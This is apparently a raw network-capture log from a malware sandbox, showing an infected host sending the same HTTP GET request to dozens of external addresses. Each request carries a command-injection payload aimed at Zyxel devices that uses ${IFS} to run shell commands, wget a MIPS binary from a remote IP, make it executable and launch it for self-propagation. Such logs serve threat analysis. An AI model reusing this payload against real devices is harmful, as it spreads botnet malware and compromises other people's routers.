                                                Jan 12, 2024 18:24:55.331737041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9260192.168.2.1349216191.28.126.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331792116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9261192.168.2.134941675.140.141.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331823111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9262192.168.2.1351196190.45.41.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331859112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9263192.168.2.1333634167.142.166.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331902027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9264192.168.2.1356032184.185.221.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331934929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9265192.168.2.1352690111.150.138.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.331975937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9266192.168.2.133390297.84.219.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332004070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9267192.168.2.134971657.39.46.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332050085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9268192.168.2.1348018158.175.180.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332073927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9269192.168.2.133462686.27.203.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332119942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9270192.168.2.1349916206.106.137.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332155943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9271192.168.2.1359550188.157.42.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332221985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9272192.168.2.134745459.210.40.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332289934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9273192.168.2.135613643.211.191.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332308054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9274192.168.2.134375292.19.2.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332354069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9275192.168.2.1339642108.181.97.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332392931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9276192.168.2.135986079.172.107.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332454920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9277192.168.2.1337254125.194.39.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332488060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9278192.168.2.135161883.74.68.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332489967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9279192.168.2.1336042169.144.89.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332535028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9280192.168.2.134099499.247.149.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332593918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9281192.168.2.1354488165.99.140.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332632065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9282192.168.2.1347064159.36.180.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332658052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9283192.168.2.134990696.27.63.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332698107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9284192.168.2.135853019.11.78.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332743883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9285192.168.2.1350798147.108.189.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332771063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9286192.168.2.1350102171.77.89.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332808971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9287192.168.2.135342618.159.169.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332849026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9288192.168.2.1357434183.253.42.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332875967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9289192.168.2.134554699.145.74.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332933903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9290192.168.2.133817266.248.198.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.332967997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9291192.168.2.1346852114.254.129.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333024979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9292192.168.2.1353236191.167.226.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333081961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9293192.168.2.1350700204.110.102.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333111048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9294192.168.2.1360466216.82.76.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333144903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9295192.168.2.1340858171.247.79.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333219051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9296192.168.2.13577128.245.192.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333251953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9297192.168.2.1354950120.220.143.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333308935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9298192.168.2.1345494213.31.227.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333323956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9299192.168.2.13372809.208.90.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333386898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9300192.168.2.1342504199.79.123.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333434105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9301192.168.2.1335924149.182.0.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333456039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9302192.168.2.134843490.231.226.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333522081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9303192.168.2.13345929.44.26.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333585978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9304192.168.2.135951473.120.49.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333620071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9305192.168.2.135759060.88.83.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333638906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9306192.168.2.133857061.178.121.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333684921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9307192.168.2.1335310130.121.67.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333765984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9308192.168.2.1360858219.181.80.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333789110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9309192.168.2.1351580107.233.221.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333827019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9310192.168.2.1343340100.167.43.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333874941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9311192.168.2.1356416209.241.11.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333935022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9312192.168.2.134497258.15.219.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.333988905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9313192.168.2.133807690.26.150.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334047079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9314192.168.2.135810067.125.255.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334074020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9315192.168.2.1335546132.215.13.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334135056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9316192.168.2.1358220207.75.217.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334156990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9317192.168.2.135824491.98.169.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334208012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9318192.168.2.1358604104.141.33.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334247112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9319192.168.2.1333594188.142.109.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334317923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9320192.168.2.1348502202.237.162.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334332943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9321192.168.2.1334426148.188.235.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:55.334367037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9322192.168.2.1349024134.201.250.87443
                                                TimestampBytes transferredDirectionData
